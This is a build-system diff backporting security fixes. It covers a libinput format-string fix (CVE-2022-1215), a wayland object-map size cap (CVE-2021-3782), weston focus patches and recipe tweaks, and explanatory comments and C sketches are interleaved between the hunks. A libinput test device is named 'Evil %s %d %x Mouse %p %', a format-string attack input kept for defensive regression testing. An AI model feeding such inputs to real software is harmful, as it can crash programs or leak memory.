+ 7 files changed, 139 insertions(+), 12 deletions(-)
+ create mode 100644 test/litest-device-format-string.c
+
+diff --git a/meson.build b/meson.build
+index 90f528e6..1f6159e7 100644
+--- a/meson.build
++++ b/meson.build
+@@ -787,6 +787,7 @@
+ 'test/litest-device-dell-canvas-totem-touch.c',
+ 'test/litest-device-elantech-touchpad.c',
+ 'test/litest-device-elan-tablet.c',
++ 'test/litest-device-format-string.c',
+ 'test/litest-device-generic-singletouch.c',
+ 'test/litest-device-gpio-keys.c',
+ 'test/litest-device-huion-pentablet.c',
+diff --git a/src/evdev.c b/src/evdev.c
+index 6d81f58f..d1c35c07 100644
+--- a/src/evdev.c
++++ b/src/evdev.c
+@@ -2356,19 +2356,19 @@ evdev_device_create(struct libinput_seat *seat,
+ struct libinput *libinput = seat->libinput;
+ struct evdev_device *device = NULL;
+ int rc;
+- int fd;
++ int fd = -1;
+ int unhandled_device = 0;
+ const char *devnode = udev_device_get_devnode(udev_device);
+- const char *sysname = udev_device_get_sysname(udev_device);
++ char *sysname = str_sanitize(udev_device_get_sysname(udev_device));
+
+ if (!devnode) {
+ log_info(libinput, "%s: no device node associated\n", sysname);
+- return NULL;
++ goto err;
+ }
+
+ if (udev_device_should_be_ignored(udev_device)) {
+ log_debug(libinput, "%s: device is ignored\n", sysname);
+- return NULL;
++ goto err;
+ }
+
+ /* Use non-blocking mode so that we can loop on read on
+@@ -2382,13 +2382,15 @@ evdev_device_create(struct libinput_seat *seat,
+ sysname,
+ devnode,
+ strerror(-fd));
+- return NULL;
++ goto err;
+ }
+
+ if (!evdev_device_have_same_syspath(udev_device, fd))
+ goto err;
+
+ device = zalloc(sizeof *device);
++ device->sysname = sysname;
++ sysname = NULL;
+
+ libinput_device_init(&device->base, seat);
+ libinput_seat_ref(seat);
+@@ -2411,6 +2413,9 @@ evdev_device_create(struct libinput_seat *seat,
+ device->dispatch = NULL;
+ device->fd = fd;
+ device->devname = libevdev_get_name(device->evdev);
++ /* the log_prefix_name is used as part of a printf format string and
++ * must not contain % directives, see evdev_log_msg */
++ device->log_prefix_name = str_sanitize(device->devname);
+ device->scroll.threshold = 5.0; /* Default may be overridden */
+ device->scroll.direction_lock_threshold = 5.0; /* Default may be overridden */
+ device->scroll.direction = 0;
+@@ -2238,9 +2238,14 @@
+ return device;
+
+ err:
+- close_restricted(libinput, fd);
+- if (device)
+- evdev_device_destroy(device);
++ if (fd >= 0) {
++ close_restricted(libinput, fd);
++ if (device) {
++ unhandled_device = device->seat_caps == 0;
++ evdev_device_destroy(device);
++ }
++ }
++ free(sysname);
+
+ return unhandled_device ? EVDEV_UNHANDLED_DEVICE : NULL;
+ }
+@@ -2469,7 +2478,7 @@ evdev_device_get_output(struct evdev_device *device)
+ const char *
+ evdev_device_get_sysname(struct evdev_device *device)
+ {
+- return udev_device_get_sysname(device->udev_device);
++ return device->sysname;
+ }
+
+ const char *
+@@ -3066,6 +3075,8 @@ evdev_device_destroy(struct evdev_device *device)
+ if (device->base.group)
+ libinput_device_group_unref(device->base.group);
+
++ free(device->log_prefix_name);
++ free(device->sysname);
+ free(device->output_name);
+ filter_destroy(device->pointer.filter);
+ libinput_timer_destroy(&device->scroll.timer);
+diff --git a/src/evdev.h b/src/evdev.h
+index c7d130f8..980c5943 100644
+--- a/src/evdev.h
++++ b/src/evdev.h
+@@ -169,6 +169,8 @@ struct evdev_device {
+ struct udev_device *udev_device;
+ char *output_name;
+ const char *devname;
++ char *log_prefix_name;
++ char *sysname;
+ bool was_removed;
+ int fd;
+ enum evdev_device_seat_capability seat_caps;
+@@ -786,7 +788,7 @@ evdev_log_msg(struct evdev_device *device,
+ sizeof(buf),
+ "%-7s - %s%s%s",
+ evdev_device_get_sysname(device),
+- (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->devname : "",
++ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->log_prefix_name : "",
+ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? ": " : "",
+ format);
+
+@@ -824,7 +826,7 @@ evdev_log_msg_ratelimit(struct evdev_device *device,
+ sizeof(buf),
+ "%-7s - %s%s%s",
+ evdev_device_get_sysname(device),
+- (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->devname : "",
++ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? device->log_prefix_name : "",
+ (priority > LIBINPUT_LOG_PRIORITY_DEBUG) ? ": " : "",
+ format);
+
+diff --git a/src/util-strings.h b/src/util-strings.h
+index 2a15fab3..d5a84146 100644
+--- a/src/util-strings.h
++++ b/src/util-strings.h
+@@ -42,6 +42,7 @@
+ #ifdef HAVE_XLOCALE_H
+ #include <xlocale.h>
+ #endif
++#include "util-macros.h"
+
+ #define streq(s1, s2) (strcmp((s1), (s2)) == 0)
+ #define strneq(s1, s2, n) (strncmp((s1), (s2), (n)) == 0)
+@@ -312,3 +313,31 @@
+ free(result);
+ return -1;
+ }
++
++/**
++ * Return a copy of str with all % converted to %% to make the string
++ * acceptable as printf format.
++ */
++static inline char *
++str_sanitize(const char *str)
++{
++ if (!str)
++ return NULL;
++
++ if (!strchr(str, '%'))
++ return strdup(str);
++
++ size_t slen = min(strlen(str), 512);
++ char *sanitized = zalloc(2 * slen + 1);
++ const char *src = str;
++ char *dst = sanitized;
++
++ for (size_t i = 0; i < slen; i++) {
++ if (*src == '%')
++ *dst++ = '%';
++ *dst++ = *src++;
++ }
++ *dst = '\0';
++
++ return sanitized;
++}
+diff --git a/test/litest-device-format-string.c b/test/litest-device-format-string.c
+new file mode 100644
+index 00000000..aed15db4
+--- /dev/null
++++ b/test/litest-device-format-string.c
+@@ -0,0 +1,56 @@
++
++/*
++ * Copyright © 2013 Red Hat, Inc.
++ *
++ * Permission is hereby granted, free of charge, to any person obtaining a
++ * copy of this software and associated documentation files (the "Software"),
++ * to deal in the Software without restriction, including without limitation
++ * the rights to use, copy, modify, merge, publish, distribute, sublicense,
++ * and/or sell copies of the Software, and to permit persons to whom the
++ * Software is furnished to do so, subject to the following conditions:
++ *
++ * The above copyright notice and this permission notice (including the next
++ * paragraph) shall be included in all copies or substantial portions of the
++ * Software.
++ *
++ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
++ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
++ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
++ * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
++ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
++ * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
++ * DEALINGS IN THE SOFTWARE.
++ */
++
++#include "config.h"
++
++#include "litest.h"
++#include "litest-int.h"
++
++static struct input_id input_id = {
++ .bustype = 0x3,
++ .vendor = 0x0123,
++ .product = 0x0456,
++};
++
++static int events[] = {
++ EV_KEY, BTN_LEFT,
++ EV_KEY, BTN_RIGHT,
++ EV_KEY, BTN_MIDDLE,
++ EV_REL, REL_X,
++ EV_REL, REL_Y,
++ EV_REL, REL_WHEEL,
++ EV_REL, REL_WHEEL_HI_RES,
++ -1 , -1,
++};
++
++TEST_DEVICE("mouse-format-string",
++ .type = LITEST_MOUSE_FORMAT_STRING,
++ .features = LITEST_RELATIVE | LITEST_BUTTON | LITEST_WHEEL,
++ .interface = NULL,
++
++ .name = "Evil %s %d %x Mouse %p %",
++ .id = &input_id,
++ .absinfo = NULL,
++ .events = events,
++)
+diff --git a/test/litest.h b/test/litest.h
+index 4982e516..1b1daa90 100644
+--- a/test/litest.h
++++ b/test/litest.h
+@@ -303,6 +303,7 @@
+ LITEST_ALPS_3FG,
+ LITEST_ELAN_TABLET,
+ LITEST_ABSINFO_OVERRIDE,
++ LITEST_MOUSE_FORMAT_STRING,
+ };
+
+ #define LITEST_DEVICELESS -2
+diff --git a/test/test-utils.c b/test/test-utils.c
+index 989adecd..e80754be 100644
+--- a/test/test-utils.c
++++ b/test/test-utils.c
+@@ -1267,6 +1267,31 @@ START_TEST(strstartswith_test)
+ }
+ END_TEST
+
++START_TEST(strsanitize_test)
++{
++ struct strsanitize_test {
++ const char *string;
++ const char *expected;
++ } tests[] = {
++ { "foobar", "foobar" },
++ { "", "" },
++ { "%", "%%" },
++ { "%%%%", "%%%%%%%%" },
++ { "x %s", "x %%s" },
++ { "x %", "x %%" },
++ { "%sx", "%%sx" },
++ { "%s%s", "%%s%%s" },
++ { NULL, NULL },
++ };
++
++ for (struct strsanitize_test *t = tests; t->string; t++) {
++ char *sanitized = str_sanitize(t->string);
++ ck_assert_str_eq(sanitized, t->expected);
++ free(sanitized);
++ }
++}
++END_TEST
++
+ START_TEST(list_test_insert)
+ {
+ struct list_test {
+@@ -1138,6 +1138,7 @@
+ tcase_add_test(tc, strsplit_test);
+ tcase_add_test(tc, kvsplit_double_test);
+ tcase_add_test(tc, strjoin_test);
++ tcase_add_test(tc, strsanitize_test);
+ tcase_add_test(tc, time_conversion);
+
+ tcase_add_test(tc, list_test_insert);
+
+--
+GitLab
+
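The heart of the CVE-2022-1215 fix is str_sanitize() above: every '%' in a kernel-supplied device name is doubled before the name is folded into a log format string, so a device advertising itself as "Evil %s %d %x Mouse %p %" can no longer drive printf-style conversions. A minimal standalone sketch of that escaping idea follows; escape_percent() is a hypothetical helper using plain malloc() rather than libinput's zalloc() and without the 512-byte cap.

    /* Standalone sketch (not the libinput implementation): double every
     * '%' so the result is safe to use where a printf format is expected. */
    #include <stdlib.h>
    #include <string.h>

    static char *escape_percent(const char *str)
    {
        if (!str)
            return NULL;

        size_t len = strlen(str);
        char *out = malloc(2 * len + 1);      /* worst case: all bytes are '%' */
        if (!out)
            return NULL;

        char *dst = out;
        for (const char *src = str; *src; src++) {
            if (*src == '%')
                *dst++ = '%';                 /* emit the doubling '%' */
            *dst++ = *src;
        }
        *dst = '\0';
        return out;
    }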
diff --git a/meta/recipes-graphics/wayland/libinput_1.15.2.bb b/meta/recipes-graphics/wayland/libinput_1.15.2.bb
index 810532774e..d7927d132a 100644
--- a/meta/recipes-graphics/wayland/libinput_1.15.2.bb
+++ b/meta/recipes-graphics/wayland/libinput_1.15.2.bb
@@ -14,6 +14,7 @@ DEPENDS = "libevdev udev mtdev"
SRC_URI = "http://www.freedesktop.org/software/${BPN}/${BP}.tar.xz \
file://determinism.patch \
+ file://CVE-2022-1215.patch \
"
SRC_URI[md5sum] = "eb6bd2907ad33d53954d70dfb881a643"
SRC_URI[sha256sum] = "971c3fbfb624f95c911adeb2803c372e4e3647d1b98f278f660051f834597747"
diff --git a/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch b/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch
new file mode 100644
index 0000000000..df204508e9
--- /dev/null
+++ b/meta/recipes-graphics/wayland/wayland/CVE-2021-3782.patch
@@ -0,0 +1,111 @@
+From 5eed6609619cc2e4eaa8618d11c15d442abf54be Mon Sep 17 00:00:00 2001
+From: Derek Foreman <derek.foreman@collabora.com>
+Date: Fri, 28 Jan 2022 13:18:37 -0600
+Subject: [PATCH] util: Limit size of wl_map
+
+Since server IDs are basically indistinguishable from really big client
+IDs at many points in the source, it's theoretically possible to overflow
+a map and either overflow server IDs into the client ID space, or grow
+client IDs into the server ID space. This would currently take a massive
+amount of RAM, but the definition of massive changes yearly.
+
+Prevent this by placing a ridiculous but arbitrary upper bound on the
+number of items we can put in a map: 0xF00000, somewhere over 15 million.
+This should satisfy pathological clients without restriction, but stays
+well clear of the 0xFF000000 transition point between server and client
+IDs. It will still take an improbable amount of RAM to hit this, and a
+client could still exhaust all RAM in this way, but our goal is to prevent
+overflow and undefined behaviour.
+
+Fixes #224
+
+Signed-off-by: Derek Foreman <derek.foreman@collabora.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3782
+
+Reference to upstream patch:
+https://gitlab.freedesktop.org/wayland/wayland/-/commit/b19488c7154b902354cb26a27f11415d7799b0b2
+
+[DP: adjust context for wayland version 1.20.0]
+Signed-off-by: Dragos-Marian Panait <dragos.panait@windriver.com>
+---
+ src/wayland-private.h | 1 +
+ src/wayland-util.c | 25 +++++++++++++++++++++++--
+ 2 files changed, 24 insertions(+), 2 deletions(-)
+
+diff --git a/src/wayland-private.h b/src/wayland-private.h
+index 9bf8cb7..35dc40e 100644
+--- a/src/wayland-private.h
++++ b/src/wayland-private.h
+@@ -45,6 +45,7 @@
+ #define WL_MAP_SERVER_SIDE 0
+ #define WL_MAP_CLIENT_SIDE 1
+ #define WL_SERVER_ID_START 0xff000000
++#define WL_MAP_MAX_OBJECTS 0x00f00000
+ #define WL_CLOSURE_MAX_ARGS 20
+
+ struct wl_object {
+diff --git a/src/wayland-util.c b/src/wayland-util.c
+index d5973bf..3e45d19 100644
+--- a/src/wayland-util.c
++++ b/src/wayland-util.c
+@@ -195,6 +195,7 @@ wl_map_insert_new(struct wl_map *map, uint32_t flags, void *data)
+ union map_entry *start, *entry;
+ struct wl_array *entries;
+ uint32_t base;
++ uint32_t count;
+
+ if (map->side == WL_MAP_CLIENT_SIDE) {
+ entries = &map->client_entries;
+@@ -215,10 +216,25 @@ wl_map_insert_new(struct wl_map *map, uint32_t flags, void *data)
+ start = entries->data;
+ }
+
++ /* wl_array only grows, so if we have too many objects at
++ * this point there's no way to clean up. We could be more
++ * pro-active about trying to avoid this allocation, but
++ * it doesn't really matter because at this point there is
++ * nothing to be done but disconnect the client and delete
++ * the whole array either way.
++ */
++ count = entry - start;
++ if (count > WL_MAP_MAX_OBJECTS) {
++ /* entry->data is freshly malloced garbage, so we'd
++ * better make it a NULL so wl_map_for_each doesn't
++ * dereference it later. */
++ entry->data = NULL;
++ return 0;
++ }
+ entry->data = data;
+ entry->next |= (flags & 0x1) << 1;
+
+- return (entry - start) + base;
++ return count + base;
+ }
+
+ int
+@@ -235,6 +251,9 @@ wl_map_insert_at(struct wl_map *map, uint32_t flags, uint32_t i, void *data)
+ i -= WL_SERVER_ID_START;
+ }
+
++ if (i > WL_MAP_MAX_OBJECTS)
++ return -1;
++
+ count = entries->size / sizeof *start;
+ if (count < i)
+ return -1;
+@@ -269,8 +288,10 @@ wl_map_reserve_new(struct wl_map *map, uint32_t i)
+ i -= WL_SERVER_ID_START;
+ }
+
+- count = entries->size / sizeof *start;
++ if (i > WL_MAP_MAX_OBJECTS)
++ return -1;
+
++ count = entries->size / sizeof *start;
+ if (count < i)
+ return -1;
+
+--
+2.37.3
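The wayland fix above caps the number of live objects in a wl_map at WL_MAP_MAX_OBJECTS (0x00f00000, roughly 15.7 million) so freshly allocated client IDs can never creep up into the server ID range that begins at 0xff000000. A simplified sketch of that guard, with the wl_array bookkeeping and flag bits left out:

    #include <stdint.h>

    #define WL_SERVER_ID_START  0xff000000u
    #define WL_MAP_MAX_OBJECTS  0x00f00000u

    /* Return the new object ID, or 0 (an invalid ID) if handing out this
     * index could ever collide with the server-side ID range. */
    static uint32_t map_alloc_id(uint32_t next_index, uint32_t base)
    {
        if (next_index > WL_MAP_MAX_OBJECTS)
            return 0;
        return next_index + base;
    }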
diff --git a/meta/recipes-graphics/wayland/wayland_1.18.0.bb b/meta/recipes-graphics/wayland/wayland_1.18.0.bb
index 00be3aac27..e621abddbf 100644
--- a/meta/recipes-graphics/wayland/wayland_1.18.0.bb
+++ b/meta/recipes-graphics/wayland/wayland_1.18.0.bb
@@ -18,6 +18,7 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \
file://0002-Do-not-hardcode-the-path-to-wayland-scanner.patch \
file://0001-build-Fix-strndup-detection-on-MinGW.patch \
file://0001-meson-tests-add-missing-dependencies-on-protocol-hea.patch \
+ file://CVE-2021-3782.patch \
"
SRC_URI[md5sum] = "23317697b6e3ff2e1ac8c5ba3ed57b65"
SRC_URI[sha256sum] = "4675a79f091020817a98fd0484e7208c8762242266967f55a67776936c2e294d"
diff --git a/meta/recipes-graphics/wayland/weston-init/weston.ini b/meta/recipes-graphics/wayland/weston-init/weston.ini
index 1e6dff68fd..40c5195887 100644
--- a/meta/recipes-graphics/wayland/weston-init/weston.ini
+++ b/meta/recipes-graphics/wayland/weston-init/weston.ini
@@ -42,7 +42,7 @@ require-input=false
#path=/build/weston-0lEgCh/weston-1.11.0/weston-flower
#[input-method]
-#path=/usr/lib/weston/weston-keyboard
+#path=/usr/libexec/weston-keyboard
#[output]
#name=LVDS1
diff --git a/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch b/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch
new file mode 100644
index 0000000000..fb36d3817a
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch
@@ -0,0 +1,32 @@
+From 5c74a0640e873694bf60a88eceb21f664cb4b8f7 Mon Sep 17 00:00:00 2001
+From: Marius Vlad <marius.vlad@collabora.com>
+Date: Fri, 5 Mar 2021 20:03:49 +0200
+Subject: [PATCH 2/5] desktop-shell: Remove no-op de-activation of the xdg
+ top-level surface
+
+The shsurf is calloc'ed so the surface count is always 0. Not only
+that but the surface is not set as active by default, so there's no
+need to de-activate it.
+
+Upstream-Status: Backport [05bef4c18a3e82376a46a4a28d978389c4c0fd0f]
+Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
+---
+ desktop-shell/shell.c | 2 --
+ 1 file changed, 2 deletions(-)
+
+diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
+index 442a625f..3791be25 100644
+--- a/desktop-shell/shell.c
++++ b/desktop-shell/shell.c
+@@ -2427,8 +2427,6 @@ desktop_surface_added(struct weston_desktop_surface *desktop_surface,
+ wl_list_init(&shsurf->children_link);
+
+ weston_desktop_surface_set_user_data(desktop_surface, shsurf);
+- weston_desktop_surface_set_activated(desktop_surface,
+- shsurf->focus_count > 0);
+ }
+
+ static void
+--
+2.34.1
+
diff --git a/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch b/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch
new file mode 100644
index 0000000000..dcd0700fca
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch
@@ -0,0 +1,57 @@
+From edb31c456ae3da7ffffefb668a37ab88075c4b67 Mon Sep 17 00:00:00 2001
+From: Marius Vlad <marius.vlad@collabora.com>
+Date: Fri, 5 Mar 2021 21:40:22 +0200
+Subject: [PATCH 3/5] desktop-shell: Rename gain/lose keyboard focus to
+ activate/de-activate
+
+This way it better reflects that it handles activation rather than input
+focus.
+
+Upstream-Status: Backport [ab39e1d76d4f6715cb300bc37f5c2a0e2d426208]
+Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
+---
+ desktop-shell/shell.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
+index 3791be25..c4669f11 100644
+--- a/desktop-shell/shell.c
++++ b/desktop-shell/shell.c
+@@ -1869,14 +1869,14 @@ handle_pointer_focus(struct wl_listener *listener, void *data)
+ }
+
+ static void
+-shell_surface_lose_keyboard_focus(struct shell_surface *shsurf)
++shell_surface_deactivate(struct shell_surface *shsurf)
+ {
+ if (--shsurf->focus_count == 0)
+ weston_desktop_surface_set_activated(shsurf->desktop_surface, false);
+ }
+
+ static void
+-shell_surface_gain_keyboard_focus(struct shell_surface *shsurf)
++shell_surface_activate(struct shell_surface *shsurf)
+ {
+ if (shsurf->focus_count++ == 0)
+ weston_desktop_surface_set_activated(shsurf->desktop_surface, true);
+@@ -1891,7 +1891,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data)
+ if (seat->focused_surface) {
+ struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+ if (shsurf)
+- shell_surface_lose_keyboard_focus(shsurf);
++ shell_surface_deactivate(shsurf);
+ }
+
+ seat->focused_surface = weston_surface_get_main_surface(keyboard->focus);
+@@ -1899,7 +1899,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data)
+ if (seat->focused_surface) {
+ struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+ if (shsurf)
+- shell_surface_gain_keyboard_focus(shsurf);
++ shell_surface_activate(shsurf);
+ }
+ }
+
+--
+2.34.1
+
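The renamed helpers above keep the existing reference-counting idea: a surface is marked activated on the 0 -> 1 transition of focus_count and de-activated on the 1 -> 0 transition, so it stays active while any seat still points at it. A self-contained sketch of that pattern (hypothetical types; set_activated() stands in for weston_desktop_surface_set_activated()):

    #include <stdbool.h>
    #include <stdio.h>

    struct surface {
        int focus_count;
    };

    static void set_activated(struct surface *s, bool active)
    {
        printf("surface %p activated=%d\n", (void *)s, active);
    }

    static void surface_activate(struct surface *s)
    {
        if (s->focus_count++ == 0)        /* 0 -> 1: becomes active */
            set_activated(s, true);
    }

    static void surface_deactivate(struct surface *s)
    {
        if (--s->focus_count == 0)        /* 1 -> 0: becomes inactive */
            set_activated(s, false);
    }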
diff --git a/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch b/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch
new file mode 100644
index 0000000000..7ca72f8494
--- /dev/null
+++ b/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch
@@ -0,0 +1,99 @@
+From 899ad5a6a8a92f2c10e0694a45c982b7d878aed6 Mon Sep 17 00:00:00 2001
+From: Marius Vlad <marius.vlad@collabora.com>
+Date: Fri, 5 Mar 2021 21:44:26 +0200
+Subject: [PATCH 4/5] desktop-shell: Embed keyboard focus handle code when
+ activating
+
+We shouldn't be constrained by having a keyboard plugged-in, so avoid
+activating/de-activating the window/surface in the keyboard focus
+handler and embed it straight into the window activation part.
+
+Upstream-Status: Backport [f12697bb3e4c6eb85437ed905e7de44ae2a0ba69]
+Signed-off-by: Marius Vlad <marius.vlad@collabora.com>
+---
+ desktop-shell/shell.c | 41 +++++++++++++++++++++++++----------------
+ 1 file changed, 25 insertions(+), 16 deletions(-)
+
+diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c
+index c4669f11..c6a4fe91 100644
+--- a/desktop-shell/shell.c
++++ b/desktop-shell/shell.c
+@@ -1885,22 +1885,7 @@ shell_surface_activate(struct shell_surface *shsurf)
+ static void
+ handle_keyboard_focus(struct wl_listener *listener, void *data)
+ {
+- struct weston_keyboard *keyboard = data;
+- struct shell_seat *seat = get_shell_seat(keyboard->seat);
+-
+- if (seat->focused_surface) {
+- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+- if (shsurf)
+- shell_surface_deactivate(shsurf);
+- }
+-
+- seat->focused_surface = weston_surface_get_main_surface(keyboard->focus);
+-
+- if (seat->focused_surface) {
+- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface);
+- if (shsurf)
+- shell_surface_activate(shsurf);
+- }
++ /* FIXME: To be removed later. */
+ }
+
+ /* The surface will be inserted into the list immediately after the link
+@@ -2438,6 +2423,7 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface,
+ struct shell_surface *shsurf_child, *tmp;
+ struct weston_surface *surface =
+ weston_desktop_surface_get_surface(desktop_surface);
++ struct weston_seat *seat;
+
+ if (!shsurf)
+ return;
+@@ -2448,6 +2434,18 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface,
+ }
+ wl_list_remove(&shsurf->children_link);
+
++ wl_list_for_each(seat, &shsurf->shell->compositor->seat_list, link) {
++ struct shell_seat *shseat = get_shell_seat(seat);
++ /* activate() controls the focused surface activation and
++ * removal of a surface requires invalidating the
++ * focused_surface to avoid activate() use a stale (and just
++ * removed) surface when attempting to de-activate it. It will
++ * also update the focused_surface once it has a chance to run.
++ */
++ if (surface == shseat->focused_surface)
++ shseat->focused_surface = NULL;
++ }
++
+ wl_signal_emit(&shsurf->destroy_signal, shsurf);
+
+ if (shsurf->fullscreen.black_view)
+@@ -3836,6 +3834,7 @@ activate(struct desktop_shell *shell, struct weston_view *view,
+ struct workspace *ws;
+ struct weston_surface *old_es;
+ struct shell_surface *shsurf, *shsurf_child;
++ struct shell_seat *shseat = get_shell_seat(seat);
+
+ main_surface = weston_surface_get_main_surface(es);
+ shsurf = get_shell_surface(main_surface);
+@@ -3855,6 +3854,16 @@ activate(struct desktop_shell *shell, struct weston_view *view,
+
+ weston_view_activate(view, seat, flags);
+
++ if (shseat->focused_surface) {
++ struct shell_surface *current_focus =
++ get_shell_surface(shseat->focused_surface);
++ assert(current_focus);
++ shell_surface_deactivate(current_focus);
++ }
++
++ shseat->focused_surface = main_surface;
++ shell_surface_activate(shsurf);
++
+ state = ensure_focus_state(shell, seat);
+ if (state == NULL)
+ return;
+--
+2.34.1
+
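Patch 0004 moves the activation bookkeeping out of the keyboard-focus listener: each shell seat remembers its focused surface, activate() de-activates the previous one, and desktop_surface_removed() clears the pointer so a just-destroyed surface is never touched through a stale reference. A hypothetical, self-contained sketch of that bookkeeping:

    #include <stdbool.h>
    #include <stddef.h>

    struct surface { bool active; };
    struct seat    { struct surface *focused; };

    static void seat_activate(struct seat *seat, struct surface *s)
    {
        if (seat->focused)
            seat->focused->active = false;   /* de-activate the old focus */
        seat->focused = s;
        if (s)
            s->active = true;
    }

    static void seat_surface_removed(struct seat *seat, struct surface *s)
    {
        if (seat->focused == s)
            seat->focused = NULL;            /* never leave a dangling pointer */
    }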
diff --git a/meta/recipes-graphics/wayland/weston_8.0.0.bb b/meta/recipes-graphics/wayland/weston_8.0.0.bb
index 8fef864827..5e4e2032c9 100644
--- a/meta/recipes-graphics/wayland/weston_8.0.0.bb
+++ b/meta/recipes-graphics/wayland/weston_8.0.0.bb
@@ -10,6 +10,9 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \
file://weston.desktop \
file://xwayland.weston-start \
file://0001-weston-launch-Provide-a-default-version-that-doesn-t.patch \
+ file://0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch \
+ file://0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch \
+ file://0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch \
"
SRC_URI[md5sum] = "53e4810d852df0601d01fd986a5b22b3"
SRC_URI[sha256sum] = "7518b49b2eaa1c3091f24671bdcc124fd49fc8f1af51161927afa4329c027848"
@@ -70,7 +73,7 @@ PACKAGECONFIG[colord] = "-Dcolor-management-colord=true,-Dcolor-management-color
# Clients support
PACKAGECONFIG[clients] = "-Dsimple-clients=all -Ddemo-clients=true,-Dsimple-clients= -Ddemo-clients=false"
# Virtual remote output with GStreamer on DRM backend
-PACKAGECONFIG[remoting] = "-Dremoting=true,-Dremoting=false,gstreamer-1.0"
+PACKAGECONFIG[remoting] = "-Dremoting=true,-Dremoting=false,gstreamer1.0"
# Weston with PAM support
PACKAGECONFIG[pam] = "-Dpam=true,-Dpam=false,libpam"
# Weston with screen-share support
diff --git a/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb b/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
index 65348c3762..baaf8fa9ad 100644
--- a/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
+++ b/meta/recipes-graphics/xinput-calibrator/pointercal-xinput_0.0.bb
@@ -1,4 +1,7 @@
SUMMARY = "Touchscreen calibration data from xinput-calibrator"
+DESCRIPTION = "A generic touchscreen calibration program for X.Org"
+HOMEPAGE = "https://www.freedesktop.org/wiki/Software/xinput_calibrator/"
+BUGTRACKER = "https://github.com/tias/xinput_calibrator/issues"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
diff --git a/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb b/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
index d2a16643fe..e524b82dd6 100644
--- a/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
+++ b/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb
@@ -12,7 +12,7 @@ inherit autotools pkgconfig features_check
REQUIRED_DISTRO_FEATURES = "x11"
SRCREV = "18ec53f1cada39f905614ebfaffed5c7754ecf46"
-SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput \
+SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput;protocol=https \
file://30xinput_calibrate.sh \
file://Allow-xinput_calibrator_pointercal.sh-to-be-run-as-n.patch \
file://0001-calibrator.hh-Include-string-to-get-std-string.patch \
diff --git a/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb b/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
index 553840ddb8..685362ef15 100644
--- a/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
+++ b/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb
@@ -13,7 +13,7 @@ SRCREV = "f66d39544bb8339130c96d282a80f87ca1606caf"
PV = "2.99.917+git${SRCPV}"
S = "${WORKDIR}/git"
-SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel"
+SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel;branch=master"
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+)"
